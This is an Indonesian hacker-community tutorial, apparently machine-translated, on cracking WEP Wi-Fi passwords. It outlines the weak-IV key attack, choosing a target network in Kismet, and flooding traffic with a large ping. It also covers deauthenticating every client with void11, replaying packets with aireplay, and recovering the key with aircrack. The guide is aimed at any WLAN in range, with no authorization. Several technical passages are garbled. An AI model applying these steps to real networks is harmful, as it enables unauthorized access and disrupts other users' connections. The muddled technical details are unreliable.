* Yang pertama nilai dalam data dienkripsi adalah SNAP, yang 0xAA, atau 170 basis 10. Sniffing pertama dari byte dan teks terenkripsi XOR-ing dengan 170 akan memberikan output byte pertama dari PRGA.
* J format tertentu yang byte yang diberikan oleh AP akan menunjukkan bahwa ia adalah lemah dan mudah untuk di crack. Format ini (B + 3, 255, X), dimana B adalah byte dari password rahasia. Dimana X dapat bernilai apapun.
Kita akan berbicara tentang KSA sekarang. Mari kita menetapkan beberapa variabel untuk “pengujian”:
* Karakter kode yang diambil dari AP adalah 3255,7. Kami sniffed itu dari udara. Kami akan menggunakannya karena hasil tes telah menunjukkan itu adalah kode yang sangat lemah.
* Shared passwordnya adalah 22222. Dalam prakteknya, Anda tidak akan tahu ini.
* N adalah 256.
* Jika ada nilai di atas 256, modulo operasi akan digelar di atasnya. Nilai yang dihasilkan itulah yang akan digunakan.
* Array ‘s’ telah dipastikan, dengan nilai 0-255.
Buka program Kismet. Kismet adalah scanner nirkabel bebas untuk Linux. Bila Anda membukanya, Anda akan melihat daftar WLAN yang berada dalam jangkauan. Pilih salah satu dan buat catatan dari keempat rincian berikut ini (perlu diketahui bahwa target komputer didapat dari setiap host pada WLAN):
* AP MAC Address
* MAC Address komputer target.
* WEP – Key digunakan
* Wi-Fi- saluran yang digunakan
Buka Aircrack dan anda akan mulai menangkap paket-paket. Anda juga akan menangkap IVs. Tapi ini memakan waktu lama. Ia bahkan dapat berlangsung selama beberapa jam atau hari untuk menangkap jumlah IVs ke crack password WEP.
Untungnya, kami dapat mempercepatnya. Misalnya, jika WLAN sangat sibuk, maka akan lebih banyak lalu lintas paket IVs, sehingga IVs lebih mudah diambil. Jika kami terus ping ke jaringan, akan menghasilkan lebih banyak paket data.
ping-t-l 50000 ip_address
Jadi apa yang harus dilakukan sekarang? Kami memiliki sedikit data, tetapi kita harus mendapatkan password WEP di sini. Ada waktu untuk meloloskan void11. Void11 yang di deauthenticate AP ke semua host yang ada disana. Cutting off dilakukan hingga ke seluruh host. Hal pertama yang dilakukan dalam hal ini adalah automaticall yang akan mencoba untuk menyambung kembali koneksi ke AP.
Namun ada teknik lain yang disebut replay attack. Ini menangkap sebuah paket dari sebuah host pada WLAN, kemudian melakukan spoofs host dan terus mengulang paket berulang ulang. Menghasilkan lalu lintas paket data yang sangat besar. Yang terbaik dari program ini adalah airreplay. Ini adalah untuk apa void11 digunakan.
Buka airodump. Sekarang, ucapkan terima kasih kepada Replay Attack. IV berjalan sekitar 200 per detik. Wow! Anda mungkin akan mendapatkan semua paket yang diperlukan dalam waktu 10 menit. Semua IVs sedang ditulis ke dalam file yang akan diambil. Kemudian buka aircrack. Aircrack akan membaca semua IVs yang di ambil dari file, dan melakukan analisis statistik pada file tsb. Lalu, ia akan berusaha untuk brute force file” yang ada. Setelah menemukan passwordnya, password itu akan diberikan pada anda.
Hehehe.. Finally: Kamu sudah mendapatkan passwordnya :D
================== [ EOF ] =================
Selamat membaca – Ini gw dedikasikan buat seluruh BinusHacker Community
Doakan usaha gw lancar ye.. Kzkzkz..
Salam buat kalian semua dari Gw [ UtuH ]
Yang ngopy: Tolong sertain nama gw ye.. Kzkzkzkz (*Narses + sarap mode on)
Uyeee… :P